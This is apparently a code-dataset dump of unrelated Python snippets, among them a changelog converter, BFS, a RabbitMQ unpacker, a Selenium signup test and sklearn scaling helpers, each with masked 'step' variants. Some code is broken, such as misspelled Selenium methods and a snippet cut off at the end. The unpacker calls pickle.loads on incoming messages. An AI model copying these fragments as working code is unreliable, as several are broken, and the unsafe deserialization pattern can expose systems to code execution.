"step-5": "#!/usr/bin/env python3\nfrom datetime import datetime\nimport re\nimport sys\n\nMONTHS_REGEXP = ('Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|'\n 'January|February|March|April|June|July|August|September|October|November|December')\n\nre_entry_begin = re.compile(r'(?P<version>[\\d.]+)[ :]*\\(?(?P<date>\\d\\d\\d\\d-\\d\\d-\\d\\d|(?:'\n + MONTHS_REGEXP + r') \\d\\d, \\d\\d\\d\\d)?\\)?.*$')\nheader_format = 'libkissfft ({version}) stable; urgency=medium\\n\\n'\nsignature_format = ' -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}\\n\\n'\n\n# Missing from CHANGELOG (found in hg log), or not parseable easily\nVERSION_DATES = {\n '1.2.8': '2008-08-22',\n '1.2.7': '2007-01-07',\n '1.2.2': '2005-05-06',\n '1.2.1': '2004-04-04',\n '1.1.1': '2004-02-01',\n '1.1': '2004-01-30',\n '0.4': '2003-11-04',\n '0.1': '2003-05-19',\n}\n\nfirst_line_met = False\ncurrent_date = None\nlast_line_blank = False\n\nfor line in sys.stdin:\n m = re_entry_begin.match(line)\n if m:\n if first_line_met:\n sys.stdout.write(signature_format.format(date=current_date))\n\n version = m.group('version')\n\n sys.stdout.write(header_format.format(version=version))\n\n date = m.group('date')\n if date is None:\n date = VERSION_DATES[version]\n\n current_date = None\n for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):\n try:\n current_date = datetime.strptime(date, date_format)\n break\n except ValueError:\n continue\n if current_date is None:\n raise ValueError('Date {} does not match any date format in {!r}'\n .format(date, date_formats))\n first_line_met = True\n\n line_blank = not line.strip() or line.startswith(r'\\* *This Change Log was')\n\n if first_line_met and not (line_blank and last_line_blank):\n sys.stdout.write(' ' + line)\n\n last_line_blank = line_blank\n\nif first_line_met:\n if not line_blank:\n sys.stdout.write('\\n')\n sys.stdout.write(signature_format.format(date=current_date))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def bfs(graph, start):
queue = [start]
queued = list()
path = list()
while queue:
print('Queue is: %s' % queue)
vertex = queue.pop(0)
print('Processing %s' % vertex)
for candidate in graph[vertex]:
if candidate not in queued:
queued.append(candidate)
queue.append(candidate)
path.append(vertex + '>' + candidate)
print('Adding %s to the queue' % candidate)
return path
|
normal
|
{
"blob_id": "7bb49712c4ef482c64f3c2a457a766de691ba7c3",
"index": 9427,
"step-1": "<mask token>\n",
"step-2": "def bfs(graph, start):\n queue = [start]\n queued = list()\n path = list()\n while queue:\n print('Queue is: %s' % queue)\n vertex = queue.pop(0)\n print('Processing %s' % vertex)\n for candidate in graph[vertex]:\n if candidate not in queued:\n queued.append(candidate)\n queue.append(candidate)\n path.append(vertex + '>' + candidate)\n print('Adding %s to the queue' % candidate)\n return path\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
'''CLASS message_unpacker
Message bodies sent through RabbitMQ may take various forms. They were packed
accordingly by the message_packager.
This class reverses the process. Currently, only implemented for message bodies
represented as strings, but could also handle various image formats in a real use
situation
Encapsulating the "unpacking" aspect into this class makes it easier to extend the
functionality of methods needed for unpacking data as a function of the data types
(e.g. lidar, radar, numeric, GPS) that are packaged by message_packager.
'''
import pickle
import json
class MessageUnpacker():
def __init__(self):
print('Generating message unpacker...')
# Unpacks messages that were packaged as a field-delimited (';') string representation
def unpack_string_to_dict(self, incoming_values):
FIELD_DELIMITER = ';'
fields = ['message_num', 'time_stamp', 'car_id', 'device_id', 'data_type', 'error_flag', 'data']
values = incoming_values.split(FIELD_DELIMITER)
record_as_dict = {}
for f, v in zip(fields, values):
record_as_dict[f] = v
record_as_dict['data'] = record_as_dict['data'].strip('\n') # artifact of message body
return record_as_dict
# Unpacks messages that were packaged as JSON
def unpack_json_to_dict(self, incoming_json):
record_as_dict = json.loads(incoming_json)
return record_as_dict
# Unpacks messages that were pickled
def unpickle_to_dict(self, pickled_message):
record_as_dict = pickle.loads(pickled_message)
return record_as_dict
|
normal
|
{
"blob_id": "2afc1027c6866e8ab9584a5f7feef4470661f763",
"index": 4246,
"step-1": "<mask token>\n\n\nclass MessageUnpacker:\n <mask token>\n <mask token>\n\n def unpack_json_to_dict(self, incoming_json):\n record_as_dict = json.loads(incoming_json)\n return record_as_dict\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass MessageUnpacker:\n <mask token>\n\n def unpack_string_to_dict(self, incoming_values):\n FIELD_DELIMITER = ';'\n fields = ['message_num', 'time_stamp', 'car_id', 'device_id',\n 'data_type', 'error_flag', 'data']\n values = incoming_values.split(FIELD_DELIMITER)\n record_as_dict = {}\n for f, v in zip(fields, values):\n record_as_dict[f] = v\n record_as_dict['data'] = record_as_dict['data'].strip('\\n')\n return record_as_dict\n\n def unpack_json_to_dict(self, incoming_json):\n record_as_dict = json.loads(incoming_json)\n return record_as_dict\n\n def unpickle_to_dict(self, pickled_message):\n record_as_dict = pickle.loads(pickled_message)\n return record_as_dict\n",
"step-3": "<mask token>\n\n\nclass MessageUnpacker:\n\n def __init__(self):\n print('Generating message unpacker...')\n\n def unpack_string_to_dict(self, incoming_values):\n FIELD_DELIMITER = ';'\n fields = ['message_num', 'time_stamp', 'car_id', 'device_id',\n 'data_type', 'error_flag', 'data']\n values = incoming_values.split(FIELD_DELIMITER)\n record_as_dict = {}\n for f, v in zip(fields, values):\n record_as_dict[f] = v\n record_as_dict['data'] = record_as_dict['data'].strip('\\n')\n return record_as_dict\n\n def unpack_json_to_dict(self, incoming_json):\n record_as_dict = json.loads(incoming_json)\n return record_as_dict\n\n def unpickle_to_dict(self, pickled_message):\n record_as_dict = pickle.loads(pickled_message)\n return record_as_dict\n",
"step-4": "<mask token>\nimport pickle\nimport json\n\n\nclass MessageUnpacker:\n\n def __init__(self):\n print('Generating message unpacker...')\n\n def unpack_string_to_dict(self, incoming_values):\n FIELD_DELIMITER = ';'\n fields = ['message_num', 'time_stamp', 'car_id', 'device_id',\n 'data_type', 'error_flag', 'data']\n values = incoming_values.split(FIELD_DELIMITER)\n record_as_dict = {}\n for f, v in zip(fields, values):\n record_as_dict[f] = v\n record_as_dict['data'] = record_as_dict['data'].strip('\\n')\n return record_as_dict\n\n def unpack_json_to_dict(self, incoming_json):\n record_as_dict = json.loads(incoming_json)\n return record_as_dict\n\n def unpickle_to_dict(self, pickled_message):\n record_as_dict = pickle.loads(pickled_message)\n return record_as_dict\n",
"step-5": "'''CLASS message_unpacker\n\n Message bodies sent through RabbitMQ may take various forms. They were packed\n accordingly by the message_packager.\n\n This class reverses the process. Currently, only implemented for message bodies\n represented as strings, but could also handle various image formats in a real use\n situation\n\n Encapsulating the \"unpacking\" aspect into this class makes it easier to extend the\n functionality of methods needed for unpacking data as a function of the data types \n (e.g. lidar, radar, numeric, GPS) that are packaged by message_packager.\n'''\nimport pickle\nimport json\n\nclass MessageUnpacker():\n\n def __init__(self):\n print('Generating message unpacker...')\n\n # Unpacks messages that were packaged as a field-delimited (';') string representation\n def unpack_string_to_dict(self, incoming_values):\n FIELD_DELIMITER = ';'\n fields = ['message_num', 'time_stamp', 'car_id', 'device_id', 'data_type', 'error_flag', 'data']\n values = incoming_values.split(FIELD_DELIMITER)\n record_as_dict = {}\n\n for f, v in zip(fields, values):\n record_as_dict[f] = v\n record_as_dict['data'] = record_as_dict['data'].strip('\\n') # artifact of message body\n\n return record_as_dict \n\n # Unpacks messages that were packaged as JSON\n def unpack_json_to_dict(self, incoming_json):\n record_as_dict = json.loads(incoming_json)\n return record_as_dict\n\n # Unpacks messages that were pickled\n def unpickle_to_dict(self, pickled_message):\n record_as_dict = pickle.loads(pickled_message)\n return record_as_dict\n\n\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License
# is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing permissions and limitations under
# the License.
from __future__ import absolute_import
from __future__ import unicode_literals
import unittest
# import Python so we can mock the parts we need to here.
import IPython.core.display
import IPython.core.magic
import datalab.utils.commands
def noop_decorator(func):
return func
IPython.core.magic.register_line_cell_magic = noop_decorator
IPython.core.magic.register_line_magic = noop_decorator
IPython.core.magic.register_cell_magic = noop_decorator
IPython.core.display.HTML = lambda x: x
IPython.core.display.JSON = lambda x: x
class TestCases(unittest.TestCase):
def test_chart_cell(self):
t = [{'country': 'US', 'quantity': 100}, {'country': 'ZA', 'quantity': 50}]
IPython.get_ipython().user_ns = {}
chart = datalab.utils.commands._chart._chart_cell({'chart': 'geo', 'data': t, 'fields': None},
'')
self.assertTrue(chart.find('charts.render(') > 0)
self.assertTrue(chart.find('\'geo\'') > 0)
self.assertTrue(chart.find('"fields": "*"') > 0)
self.assertTrue(chart.find('{"c": [{"v": "US"}, {"v": 100}]}') > 0 or
chart.find('{"c": [{"v": 100}, {"v": "US"}]}') > 0)
self.assertTrue(chart.find('{"c": [{"v": "ZA"}, {"v": 50}]}') > 0 or
chart.find('{"c": [{"v": 50}, {"v": "ZA"}]}') > 0)
def test_chart_magic(self):
# TODO(gram): complete this test
pass
|
normal
|
{
"blob_id": "445e91edbeb88a3e300761342b28369fd9833fbb",
"index": 5727,
"step-1": "<mask token>\n\n\nclass TestCases(unittest.TestCase):\n\n def test_chart_cell(self):\n t = [{'country': 'US', 'quantity': 100}, {'country': 'ZA',\n 'quantity': 50}]\n IPython.get_ipython().user_ns = {}\n chart = datalab.utils.commands._chart._chart_cell({'chart': 'geo',\n 'data': t, 'fields': None}, '')\n self.assertTrue(chart.find('charts.render(') > 0)\n self.assertTrue(chart.find(\"'geo'\") > 0)\n self.assertTrue(chart.find('\"fields\": \"*\"') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"US\"}, {\"v\": 100}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 100}, {\"v\": \"US\"}]}') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"ZA\"}, {\"v\": 50}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 50}, {\"v\": \"ZA\"}]}') > 0)\n\n def test_chart_magic(self):\n pass\n",
"step-2": "<mask token>\n\n\ndef noop_decorator(func):\n return func\n\n\n<mask token>\n\n\nclass TestCases(unittest.TestCase):\n\n def test_chart_cell(self):\n t = [{'country': 'US', 'quantity': 100}, {'country': 'ZA',\n 'quantity': 50}]\n IPython.get_ipython().user_ns = {}\n chart = datalab.utils.commands._chart._chart_cell({'chart': 'geo',\n 'data': t, 'fields': None}, '')\n self.assertTrue(chart.find('charts.render(') > 0)\n self.assertTrue(chart.find(\"'geo'\") > 0)\n self.assertTrue(chart.find('\"fields\": \"*\"') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"US\"}, {\"v\": 100}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 100}, {\"v\": \"US\"}]}') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"ZA\"}, {\"v\": 50}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 50}, {\"v\": \"ZA\"}]}') > 0)\n\n def test_chart_magic(self):\n pass\n",
"step-3": "<mask token>\n\n\ndef noop_decorator(func):\n return func\n\n\nIPython.core.magic.register_line_cell_magic = noop_decorator\nIPython.core.magic.register_line_magic = noop_decorator\nIPython.core.magic.register_cell_magic = noop_decorator\nIPython.core.display.HTML = lambda x: x\nIPython.core.display.JSON = lambda x: x\n\n\nclass TestCases(unittest.TestCase):\n\n def test_chart_cell(self):\n t = [{'country': 'US', 'quantity': 100}, {'country': 'ZA',\n 'quantity': 50}]\n IPython.get_ipython().user_ns = {}\n chart = datalab.utils.commands._chart._chart_cell({'chart': 'geo',\n 'data': t, 'fields': None}, '')\n self.assertTrue(chart.find('charts.render(') > 0)\n self.assertTrue(chart.find(\"'geo'\") > 0)\n self.assertTrue(chart.find('\"fields\": \"*\"') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"US\"}, {\"v\": 100}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 100}, {\"v\": \"US\"}]}') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"ZA\"}, {\"v\": 50}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 50}, {\"v\": \"ZA\"}]}') > 0)\n\n def test_chart_magic(self):\n pass\n",
"step-4": "from __future__ import absolute_import\nfrom __future__ import unicode_literals\nimport unittest\nimport IPython.core.display\nimport IPython.core.magic\nimport datalab.utils.commands\n\n\ndef noop_decorator(func):\n return func\n\n\nIPython.core.magic.register_line_cell_magic = noop_decorator\nIPython.core.magic.register_line_magic = noop_decorator\nIPython.core.magic.register_cell_magic = noop_decorator\nIPython.core.display.HTML = lambda x: x\nIPython.core.display.JSON = lambda x: x\n\n\nclass TestCases(unittest.TestCase):\n\n def test_chart_cell(self):\n t = [{'country': 'US', 'quantity': 100}, {'country': 'ZA',\n 'quantity': 50}]\n IPython.get_ipython().user_ns = {}\n chart = datalab.utils.commands._chart._chart_cell({'chart': 'geo',\n 'data': t, 'fields': None}, '')\n self.assertTrue(chart.find('charts.render(') > 0)\n self.assertTrue(chart.find(\"'geo'\") > 0)\n self.assertTrue(chart.find('\"fields\": \"*\"') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"US\"}, {\"v\": 100}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 100}, {\"v\": \"US\"}]}') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"ZA\"}, {\"v\": 50}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 50}, {\"v\": \"ZA\"}]}') > 0)\n\n def test_chart_magic(self):\n pass\n",
"step-5": "# Copyright 2015 Google Inc. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except\n# in compliance with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n# or implied. See the License for the specific language governing permissions and limitations under\n# the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\nimport unittest\n\n# import Python so we can mock the parts we need to here.\nimport IPython.core.display\nimport IPython.core.magic\n\nimport datalab.utils.commands\n\n\ndef noop_decorator(func):\n return func\n\n\nIPython.core.magic.register_line_cell_magic = noop_decorator\nIPython.core.magic.register_line_magic = noop_decorator\nIPython.core.magic.register_cell_magic = noop_decorator\nIPython.core.display.HTML = lambda x: x\nIPython.core.display.JSON = lambda x: x\n\n\nclass TestCases(unittest.TestCase):\n\n def test_chart_cell(self):\n t = [{'country': 'US', 'quantity': 100}, {'country': 'ZA', 'quantity': 50}]\n IPython.get_ipython().user_ns = {}\n chart = datalab.utils.commands._chart._chart_cell({'chart': 'geo', 'data': t, 'fields': None},\n '')\n self.assertTrue(chart.find('charts.render(') > 0)\n self.assertTrue(chart.find('\\'geo\\'') > 0)\n self.assertTrue(chart.find('\"fields\": \"*\"') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"US\"}, {\"v\": 100}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 100}, {\"v\": \"US\"}]}') > 0)\n self.assertTrue(chart.find('{\"c\": [{\"v\": \"ZA\"}, {\"v\": 50}]}') > 0 or\n chart.find('{\"c\": [{\"v\": 50}, {\"v\": \"ZA\"}]}') > 0)\n\n def test_chart_magic(self):\n # TODO(gram): complete this test\n pass\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(int(first_digit) + int(second_digit))
<|reserved_special_token_1|>
two_digit_number = input('Type a two digit number: ')
first_digit = two_digit_number[0]
second_digit = two_digit_number[1]
print(int(first_digit) + int(second_digit))
<|reserved_special_token_1|>
two_digit_number=input("Type a two digit number: ")
first_digit=two_digit_number[0]
second_digit=two_digit_number[1]
print(int(first_digit)+int(second_digit))
|
flexible
|
{
"blob_id": "7d65e4e925e90d6b013ae2c059cde58538884d22",
"index": 7239,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(int(first_digit) + int(second_digit))\n",
"step-3": "two_digit_number = input('Type a two digit number: ')\nfirst_digit = two_digit_number[0]\nsecond_digit = two_digit_number[1]\nprint(int(first_digit) + int(second_digit))\n",
"step-4": "\r\ntwo_digit_number=input(\"Type a two digit number: \")\r\nfirst_digit=two_digit_number[0]\r\nsecond_digit=two_digit_number[1]\r\nprint(int(first_digit)+int(second_digit))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
setup(name='discord-ext-menus', author='TierGamerpy', url=
'https://github.com/TierGamerpy/discord-ext-menus', version=0.1,
packages=['discord.ext.menus'], description=
'An extension module to make reaction based menus with discord.py',
install_requires=['discord.py>=1.2.5'], python_requires='>=3.5.3')
<|reserved_special_token_1|>
from setuptools import setup
setup(name='discord-ext-menus', author='TierGamerpy', url=
'https://github.com/TierGamerpy/discord-ext-menus', version=0.1,
packages=['discord.ext.menus'], description=
'An extension module to make reaction based menus with discord.py',
install_requires=['discord.py>=1.2.5'], python_requires='>=3.5.3')
|
flexible
|
{
"blob_id": "daa287eeb967d47c9a8420beccf531d9c157e925",
"index": 3217,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='discord-ext-menus', author='TierGamerpy', url=\n 'https://github.com/TierGamerpy/discord-ext-menus', version=0.1,\n packages=['discord.ext.menus'], description=\n 'An extension module to make reaction based menus with discord.py',\n install_requires=['discord.py>=1.2.5'], python_requires='>=3.5.3')\n",
"step-3": "from setuptools import setup\nsetup(name='discord-ext-menus', author='TierGamerpy', url=\n 'https://github.com/TierGamerpy/discord-ext-menus', version=0.1,\n packages=['discord.ext.menus'], description=\n 'An extension module to make reaction based menus with discord.py',\n install_requires=['discord.py>=1.2.5'], python_requires='>=3.5.3')\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from django.contrib import admin
# from .models import Usuario
# from .models import Lote
# from .models import Fornecedor
# from .models import Cliente
# from .models import Medicamento
# from .models import Medicamento_Entrada
# from .models import Medicamento_Saida
# Register your models here.
#
# class UsuarioAdmin(admin.ModelAdmin):
# list_display = ['nome','login','senha']
# class FornecedorAdmin(admin.ModelAdmin):
# list_display = ['nome','contato']
# class LoteAdmin(admin.ModelAdmin):
# list_display = ['numero','fornecedor','fabricacao','vencimento']
# class ClienteAdmin(admin.ModelAdmin):
# list_display = ['nome','contato']
# class MedicamentoAdmin(admin.ModelAdmin):
# list_display = ['nome','data_insercao','descricao']
# class Medicamento_EntradaAdmin(admin.ModelAdmin):
# list_display = ['medicamento','lote','quantidade','data_entrada','usuario']
# class Medicamento_SaidaAdmin(admin.ModelAdmin):
# list_display = ['medicamento','quantidade','data_saida','usuario']
# admin.site.register(Usuario,UsuarioAdmin)
# admin.site.register(Lote,LoteAdmin)
# admin.site.register(Fornecedor,FornecedorAdmin)
# admin.site.register(Cliente,ClienteAdmin)
# admin.site.register(Medicamento,MedicamentoAdmin)
# admin.site.register(Medicamento_Entrada,Medicamento_EntradaAdmin)
# admin.site.register(Medicamento_Saida,Medicamento_SaidaAdmin)
|
normal
|
{
"blob_id": "63a2258bf0ed779254b68a683e3d30e9fb356b1f",
"index": 139,
"step-1": "<mask token>\n",
"step-2": "from django.contrib import admin\n",
"step-3": "from django.contrib import admin\n# from .models import Usuario\n# from .models import Lote\n# from .models import Fornecedor\n# from .models import Cliente\n# from .models import Medicamento\n# from .models import Medicamento_Entrada\n# from .models import Medicamento_Saida\n# Register your models here.\n#\n# class UsuarioAdmin(admin.ModelAdmin):\n# \tlist_display = ['nome','login','senha']\n\n# class FornecedorAdmin(admin.ModelAdmin):\n# \tlist_display = ['nome','contato']\n\n# class LoteAdmin(admin.ModelAdmin):\n# \tlist_display = ['numero','fornecedor','fabricacao','vencimento']\n\n# class ClienteAdmin(admin.ModelAdmin):\n# \tlist_display = ['nome','contato']\n\n# class MedicamentoAdmin(admin.ModelAdmin):\n# \tlist_display = ['nome','data_insercao','descricao']\n\n# class Medicamento_EntradaAdmin(admin.ModelAdmin):\n# \tlist_display = ['medicamento','lote','quantidade','data_entrada','usuario']\n\n# class Medicamento_SaidaAdmin(admin.ModelAdmin):\n# \tlist_display = ['medicamento','quantidade','data_saida','usuario']\n\n\n# admin.site.register(Usuario,UsuarioAdmin)\n# admin.site.register(Lote,LoteAdmin)\n# admin.site.register(Fornecedor,FornecedorAdmin)\n# admin.site.register(Cliente,ClienteAdmin)\n# admin.site.register(Medicamento,MedicamentoAdmin)\n# admin.site.register(Medicamento_Entrada,Medicamento_EntradaAdmin)\n# admin.site.register(Medicamento_Saida,Medicamento_SaidaAdmin)",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
def test_register_new_accont(self):
cos = self.cos
cos.get("https://wizzair.com/pl-pl#/")
cos.find_elements_by_class_name('navigation__button navigation__button--simple').click()
cos.find_elements_by_class_name('content__link1').click()
cos.find_elemebts_by_name('firstName').click()
cos.find_elemebts_by_name('firstName').clear()
cos.find_elemebts_by_name('firstName').send_keys("Jonasz")
cos.find_elemebts_by_name('lastName').click()
cos.find_elemebts_by_name('lastName').clear()
cos.find_elemebts_by_name('lastName').send_keys("Zsanoj")
cos.find_elements_by_class_name('rf-switch__label').click()
cos.find_elemebts_by_name('mobilePhone').click()
cos.find_elemebts_by_name('mobilePhone').clear()
cos.find_elemebts_by_name('mobilePhone').send_keys('71661234567')
cos.find_elemebts_by_name('email').click()
cos.find_elemebts_by_name('email').clear()
cos.find_elemebts_by_name('email').send_keys('[email protected]')
cos.find_elemebts_by_name('password').click()
cos.find_elemebts_by_name('password').clear()
cos.find_elemebts_by_name('password').send_keys('zaq1@WSX')
cos.find_elements_by_class_name('rf-input__input rf-input__input--empty').click()
|
normal
|
{
"blob_id": "6efd22feb4f96de74633276b1ec8550f8d853075",
"index": 2657,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_register_new_accont(self):\n cos = self.cos\n cos.get('https://wizzair.com/pl-pl#/')\n cos.find_elements_by_class_name(\n 'navigation__button navigation__button--simple').click()\n cos.find_elements_by_class_name('content__link1').click()\n cos.find_elemebts_by_name('firstName').click()\n cos.find_elemebts_by_name('firstName').clear()\n cos.find_elemebts_by_name('firstName').send_keys('Jonasz')\n cos.find_elemebts_by_name('lastName').click()\n cos.find_elemebts_by_name('lastName').clear()\n cos.find_elemebts_by_name('lastName').send_keys('Zsanoj')\n cos.find_elements_by_class_name('rf-switch__label').click()\n cos.find_elemebts_by_name('mobilePhone').click()\n cos.find_elemebts_by_name('mobilePhone').clear()\n cos.find_elemebts_by_name('mobilePhone').send_keys('71661234567')\n cos.find_elemebts_by_name('email').click()\n cos.find_elemebts_by_name('email').clear()\n cos.find_elemebts_by_name('email').send_keys('[email protected]')\n cos.find_elemebts_by_name('password').click()\n cos.find_elemebts_by_name('password').clear()\n cos.find_elemebts_by_name('password').send_keys('zaq1@WSX')\n cos.find_elements_by_class_name('rf-input__input rf-input__input--empty'\n ).click()\n",
"step-3": "from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n\ndef test_register_new_accont(self):\n cos = self.cos\n cos.get('https://wizzair.com/pl-pl#/')\n cos.find_elements_by_class_name(\n 'navigation__button navigation__button--simple').click()\n cos.find_elements_by_class_name('content__link1').click()\n cos.find_elemebts_by_name('firstName').click()\n cos.find_elemebts_by_name('firstName').clear()\n cos.find_elemebts_by_name('firstName').send_keys('Jonasz')\n cos.find_elemebts_by_name('lastName').click()\n cos.find_elemebts_by_name('lastName').clear()\n cos.find_elemebts_by_name('lastName').send_keys('Zsanoj')\n cos.find_elements_by_class_name('rf-switch__label').click()\n cos.find_elemebts_by_name('mobilePhone').click()\n cos.find_elemebts_by_name('mobilePhone').clear()\n cos.find_elemebts_by_name('mobilePhone').send_keys('71661234567')\n cos.find_elemebts_by_name('email').click()\n cos.find_elemebts_by_name('email').clear()\n cos.find_elemebts_by_name('email').send_keys('[email protected]')\n cos.find_elemebts_by_name('password').click()\n cos.find_elemebts_by_name('password').clear()\n cos.find_elemebts_by_name('password').send_keys('zaq1@WSX')\n cos.find_elements_by_class_name('rf-input__input rf-input__input--empty'\n ).click()\n",
"step-4": "from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\ndef test_register_new_accont(self):\n cos = self.cos\n cos.get(\"https://wizzair.com/pl-pl#/\")\n cos.find_elements_by_class_name('navigation__button navigation__button--simple').click()\n cos.find_elements_by_class_name('content__link1').click()\n cos.find_elemebts_by_name('firstName').click()\n cos.find_elemebts_by_name('firstName').clear()\n cos.find_elemebts_by_name('firstName').send_keys(\"Jonasz\")\n cos.find_elemebts_by_name('lastName').click()\n cos.find_elemebts_by_name('lastName').clear()\n cos.find_elemebts_by_name('lastName').send_keys(\"Zsanoj\")\n cos.find_elements_by_class_name('rf-switch__label').click()\n cos.find_elemebts_by_name('mobilePhone').click()\n cos.find_elemebts_by_name('mobilePhone').clear()\n cos.find_elemebts_by_name('mobilePhone').send_keys('71661234567')\n cos.find_elemebts_by_name('email').click()\n cos.find_elemebts_by_name('email').clear()\n cos.find_elemebts_by_name('email').send_keys('[email protected]')\n cos.find_elemebts_by_name('password').click()\n cos.find_elemebts_by_name('password').clear()\n cos.find_elemebts_by_name('password').send_keys('zaq1@WSX')\n cos.find_elements_by_class_name('rf-input__input rf-input__input--empty').click()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if a >= 0:
if c >= 0:
ans = b * d
elif d >= 0:
ans = b * d
else:
ans = a * d
elif b >= 0:
if c >= 0:
ans = b * d
elif d >= 0:
ans = max(b * d, a * c)
else:
ans = a * c
elif c >= 0:
ans = b * c
elif d >= 0:
ans = a * c
else:
ans = a * c
print(ans)
<|reserved_special_token_1|>
a, b, c, d = map(int, input().split())
ans = 0
if a >= 0:
if c >= 0:
ans = b * d
elif d >= 0:
ans = b * d
else:
ans = a * d
elif b >= 0:
if c >= 0:
ans = b * d
elif d >= 0:
ans = max(b * d, a * c)
else:
ans = a * c
elif c >= 0:
ans = b * c
elif d >= 0:
ans = a * c
else:
ans = a * c
print(ans)
<|reserved_special_token_1|>
a,b,c,d=map(int,input().split())
ans=0
if a>=0:
if c>=0:
ans=b*d
elif d>=0:
ans=b*d
else:
ans=a*d
elif b>=0:
if c>=0:
ans=b*d
elif d>=0:
ans=max(b*d,a*c)
else:
ans=a*c
else:
if c>=0:
ans=b*c
elif d>=0:
ans=a*c
else:
ans=a*c
print(ans)
|
flexible
|
{
"blob_id": "be37a7596850050af58f735e60bdf13594715caf",
"index": 4928,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif a >= 0:\n if c >= 0:\n ans = b * d\n elif d >= 0:\n ans = b * d\n else:\n ans = a * d\nelif b >= 0:\n if c >= 0:\n ans = b * d\n elif d >= 0:\n ans = max(b * d, a * c)\n else:\n ans = a * c\nelif c >= 0:\n ans = b * c\nelif d >= 0:\n ans = a * c\nelse:\n ans = a * c\nprint(ans)\n",
"step-3": "a, b, c, d = map(int, input().split())\nans = 0\nif a >= 0:\n if c >= 0:\n ans = b * d\n elif d >= 0:\n ans = b * d\n else:\n ans = a * d\nelif b >= 0:\n if c >= 0:\n ans = b * d\n elif d >= 0:\n ans = max(b * d, a * c)\n else:\n ans = a * c\nelif c >= 0:\n ans = b * c\nelif d >= 0:\n ans = a * c\nelse:\n ans = a * c\nprint(ans)\n",
"step-4": "a,b,c,d=map(int,input().split())\nans=0\nif a>=0:\n if c>=0:\n ans=b*d\n elif d>=0:\n ans=b*d\n else:\n ans=a*d\nelif b>=0:\n if c>=0:\n ans=b*d\n elif d>=0:\n ans=max(b*d,a*c)\n else:\n ans=a*c\nelse:\n if c>=0:\n ans=b*c\n elif d>=0:\n ans=a*c\n else:\n ans=a*c\nprint(ans)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import PowerTransformer
from sklearn.preprocessing import RobustScaler
from sklearn.preprocessing import Normalizer
from sklearn.preprocessing import MinMaxScaler
import pandas as pd
import numpy as np
def preprocess_transformers(y_train, transf):
if transf != 'ln':
if transf == 'minmax':
scaler = MinMaxScaler()
scaler2 = MinMaxScaler()
elif transf == 'standard':
scaler = StandardScaler()
scaler2 = StandardScaler()
elif transf == 'robust':
scaler = RobustScaler()
scaler2 = RobustScaler()
elif transf == 'boxcox':
scaler = PowerTransformer(method='yeo-johnson')
scaler2 = PowerTransformer(method='yeo-johnson')
mm_scaler2 = scaler2.fit(y_train)
y_train = mm_scaler2.transform(y_train)
else:
# y_train = y_train.values
y_train = np.log(y_train).values
mm_scaler2 = ''
return y_train, mm_scaler2
def transformacion_inversa(y_predict, mm_scaler2):
if mm_scaler2 != '':
y_predict = mm_scaler2.inverse_transform(pd.DataFrame(y_predict))
else:
